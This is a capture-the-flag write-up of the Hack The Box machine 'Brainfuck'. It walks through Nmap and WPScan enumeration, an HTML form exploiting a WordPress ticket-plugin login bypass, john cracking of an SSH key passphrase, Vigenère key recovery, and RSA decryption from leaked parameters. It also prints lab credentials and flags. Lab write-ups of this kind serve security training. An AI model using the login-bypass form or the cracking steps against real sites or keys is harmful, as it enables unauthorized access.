Brainfuck was a nice, quick box on the Hack The Box site. It was rated Insane, but it felt more like a Medium box. The box had two name-based virtual hosts serving two different sites: one ran WordPress and the other a text forum based on Flarum. We had to exploit both to gain SSH access to the box. The box also had an SMTP server that was not intended for exploitation but merely for interaction. So let's get started!
We start with an Nmap scan to see which ports are open on the box.
# Nmap 7.80 scan initiated Thu Mar 26 22:25:36 2020 as: Nmap -sC -sV -oN Nmap/brainfuck 10.10.10.17
Nmap scan report for 10.10.10.17
Host is up (0.41s latency).
Not shown: 995 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 94:d0:b3:34:e9:a5:37:c5:ac:b9:80:df:2a:54:a5:f0 (RSA)
| 256 6b:d5:dc:15:3a:66:7a:f4:19:91:5d:73:85:b2:4c:b2 (ECDSA)
|_ 256 23:f5:a3:33:33:9d:76:d5:f2:ea:69:71:e3:4e:8e:02 (ED25519)
25/tcp open smtp?
|_smtp-commands: Couldn't establish connection on port 25
110/tcp open pop3 Dovecot pop3d
143/tcp open tcpwrapped
443/tcp open https nginx/1.10.0 (Ubuntu)
|_http-server-header: nginx/1.10.0 (Ubuntu)
| ssl-cert: Subject: commonName=brainfuck.htb/organizationName=Brainfuck Ltd./stateOrProvinceName=Attica/countryName=GR
| Subject Alternative Name: DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb
| Not valid before: 2017-04-13T11:19:29
|_Not valid after: 2027-04-11T11:19:29
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
| tls-nextprotoneg:
|_ http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Mar 26 22:27:18 2020 -- 1 IP address (1 host up) scanned in 101.55 seconds
The Nmap scan reveals some interesting ports such as 25 and 110, which are SMTP (Simple Mail Transfer Protocol) and POP3 (Post Office Protocol) respectively. Since port 443 (HTTPS) is also open, let's start with that, as it has the wider attack surface.
By default the web page showed the Nginx default page, so let's start by examining the SSL certificate for information such as usernames, email addresses and domain names. On examining the certificate we find an email address and some DNS names:
E = orestis@brainfuck.htb
CN = brainfuck.htb
OU = IT
O = Brainfuck Ltd.
L = Athens
ST = Attica
C = GR
======================================
DNS Name: www.brainfuck.htb
DNS Name: sup3rs3cr3t.brainfuck.htb
Now let's add these entries to our /etc/hosts file and examine the web pages again. We find two different content management systems running on the two DNS names.
www.brainfuck.htb runs WordPress, so we will use wpscan to examine it; the other is a text forum which, after some googling around, turned out to be running Flarum. The forum looks like it will require login credentials for further enumeration, so we will ignore it for now.
Examining the WordPress scan output we get a bunch of details.
WordPress Security Scanner by the WPScan Team
Version 3.7.9
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
URL: https://brainfuck.htb/ [10.10.10.17]
Started: Fri Mar 27 18:07:57 2020
Interesting Finding(s):
Headers
| Interesting Entry: Server: nginx/1.10.0 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
XML-RPC seems to be enabled: https://brainfuck.htb/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
https://brainfuck.htb/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
https://brainfuck.htb/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
WordPress version 4.7.3 identified (Insecure, released on 2017-03-06).
| Found By: Rss Generator (Passive Detection)
| - https://brainfuck.htb/?feed=rss2, <generator>https://wordpress.org/?v=4.7.3</generator>
| - https://brainfuck.htb/?feed=comments-rss2, <generator>https://wordpress.org/?v=4.7.3</generator>
WordPress theme in use: proficient
| Location: https://brainfuck.htb/wp-content/themes/proficient/
| Last Updated: 2020-03-02T00:00:00.000Z
| Readme: https://brainfuck.htb/wp-content/themes/proficient/readme.txt
| The version is out of date, the latest version is 3.0.15
| Style URL: https://brainfuck.htb/wp-content/themes/proficient/style.css?ver=4.7.3
| Style Name: Proficient
| Description: Proficient is a Multipurpose WordPress theme with lots of powerful features, instantly giving a prof...
| Author: Specia
| Author URI: https://speciatheme.com/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.0.6 (80% confidence)
| Found By: Style (Passive Detection)
| - https://brainfuck.htb/wp-content/themes/proficient/style.css?ver=4.7.3, Match: 'Version: 1.0.6'
Enumerating All Plugins (via Passive Methods)
Checking Plugin Versions (via Passive and Aggressive Methods)
Plugin(s) Identified:
wp-support-plus-responsive-ticket-system
| Location: https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/
| Last Updated: 2019-09-03T07:57:00.000Z
| The version is out of date, the latest version is 9.1.2
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 7.1.3 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt
Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups
No Config Backups Found.
No WPVulnDB API Token given, as a result, vulnerability data has not been output.
You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up
Finished: Fri Mar 27 18:08:13 2020
Requests Done: 53
Cached Requests: 5
Data Sent: 11.692 KB
Data Received: 161.223 KB
Memory used: 182.68 MB
Elapsed time: 00:00:15
We find that WordPress, through the outdated WP Support Plus Responsive Ticket System plugin, is vulnerable to https://www.exploit-db.com/exploits/41006, which logs us in with an admin session. Editing the exploit to suit our needs gives us the following exploit code.
<form method="post" action="http://www.brainfuck.htb/wp-admin/admin-ajax.php">
Username: <input type="text" name="username" value="administrator">
<input type="hidden" name="email" value="sth">
<input type="hidden" name="action" value="loginGuestFacebook">
<input type="submit" value="Login">
</form>
Save it in an HTML file, open it with Firefox and submit the form; once done, go to wp-admin to view the dashboard. Enumerating the WordPress dashboard we find the SMTP password. The field is masked, so view its value with the browser's developer tools by inspecting the element. We get the credentials as
username: orestis@brainfuck.htb
password: kHGuERB29DNiNE
Since we now have SMTP credentials, let's open Blue Bird and log in to the mail server. Login is fairly simple:
just use orestis as the username, orestis@brainfuck.htb as the email address, and the password above.
Once in, we find an email talking about the credentials for the text forum we found earlier. The credentials are the following.
username: orestis
password: kIEnnfEKJ#9UmdO
Exploring the text forum we find a thread about the SSH key, where its location is given in some sort of Vigenère-encrypted form. Online tools such as dcode.fr cannot decrypt it directly because we don't know the key. But one of the encrypted strings looks like a URL.
Since it is a URL and has 4 letters at the start, it must start with https. Based on that we can derive a partial key, which in our case will be
FUCKM
Now, using dcode.fr's "Knowing Partial Key" option, enter this partial key and paste the encrypted text to derive the rest of the key. This gives us the full key as:
FUCKMYBRAIN
Now that we know the Vigenère key, let's decrypt the SSH key URL and download the key.
Once we have the SSH key we find it is passphrase-protected. Using ssh2john to convert the key to a hash and then running john with the rockyou wordlist gets us the passphrase.
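As an added example (not part of the original write-up), this Python script shows the known-plaintext step the author did on dcode.fr: subtracting the expected https prefix from the ciphertext gives the first key letters, and with a crib at least as long as the key the fragment repeats and reveals the whole key, which goes beyond the page's https-only case. The URL and its ciphertext are constructed here with the key FUCKMYBRAIN; the forum's actual ciphertext is not reproduced.

```python
import string

ALPHABET = string.ascii_uppercase


def vigenere(text, key, decrypt=False):
    """Vigenere over A-Z; non-letters pass through and do not consume key characters."""
    out, k = [], 0
    for ch in text:
        if not ch.isalpha():
            out.append(ch)
            continue
        shift = ALPHABET.index(key[k % len(key)].upper())
        if decrypt:
            shift = -shift
        base = ord("A") if ch.isupper() else ord("a")
        out.append(chr((ord(ch) - base + shift) % 26 + base))
        k += 1
    return "".join(out)


def letters(s):
    return [c for c in s if c.isalpha()]


def key_fragment(ciphertext, crib):
    """Known-plaintext recovery: key[i] = cipher[i] - plain[i] (mod 26), letters only."""
    frag = []
    for c, p in zip(letters(ciphertext), letters(crib)):
        frag.append(ALPHABET[(ALPHABET.index(c.upper()) - ALPHABET.index(p.upper())) % 26])
    return "".join(frag)


def recover_key(ciphertext, crib):
    """If the crib is at least as long as the key, the fragment repeats: return its shortest period."""
    frag = key_fragment(ciphertext, crib)
    for n in range(1, len(frag) + 1):
        if all(frag[i] == frag[i % n] for i in range(len(frag))):
            return frag[:n]
    return frag


# Constructed sample (assumption): a made-up URL encrypted with the write-up's key.
SAMPLE_KEY = "FUCKMYBRAIN"
SAMPLE_PLAIN = "https://example.invalid/keys/id_rsa"
SAMPLE_CIPHER = vigenere(SAMPLE_PLAIN, SAMPLE_KEY)

if __name__ == "__main__":
    print("partial key from 'https':", key_fragment(SAMPLE_CIPHER, "https"))
    print("full key from a long crib:", recover_key(SAMPLE_CIPHER, SAMPLE_PLAIN))
    print("decrypted:", vigenere(SAMPLE_CIPHER, SAMPLE_KEY, decrypt=True))
```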
ssh2john id.rsa > hash
john --wordlist=~/rockyou hash
password found: 3poulakia!
We use that passphrase and boom! We are in, and can read the user.txt file.
cat user.txt
2c11cfbc5b959f73ac15a3310bd097c9
In the home directory of the user orestis we find a file named encrypt.sage. On some enumeration I found that Sage is a mathematical programming language used for calculations. Fortunately, the script looks like an RSA implementation, and Python can be used to decrypt the encrypted file.
nbits = 1024
password = open("/root/root.txt").read().strip()
enc_pass = open("output.txt","w")
debug = open("debug.txt","w")
m = Integer(int(password.encode('hex'),16))
p = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
q = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
n = p*q
phi = (p-1)*(q-1)
e = ZZ.random_element(phi)
while gcd(e, phi) != 1:
    e = ZZ.random_element(phi)
c = pow(m, e, n)
enc_pass.write('Encrypted Password: '+str(c)+'\n')
# the private factors and e are written to debug.txt, which is all that is needed to rebuild d
debug.write(str(p)+'\n')
debug.write(str(q)+'\n')
debug.write(str(e)+'\n')
Everything we need to decrypt the RSA ciphertext (p, q and e) is in the debug file, so decrypting the ciphertext from output.txt should give us the root.txt hash.
I wrote a Python script to do the decryption.
from Crypto.Util.number import inverse, long_to_bytes

# p, q and e are copied from debug.txt; enc is the ciphertext from output.txt
p = 7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307
q = 7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079
e = 30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997
enc = 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182
phi = (p-1)*(q-1)
d = inverse(e, phi)        # private exponent: e*d == 1 mod phi
mess = pow(enc, d, p*q)    # m = c^d mod n
print(hex(mess))
print("password found")
# reverse the script's int(password.encode('hex'),16) step to get the original text
print(long_to_bytes(mess).decode())
This gives us the root.txt hash. I tried to get a root shell, but it was not intended and I didn't find any reliable path.
That was the box; I will upload other Linux OSCP-style boxes later.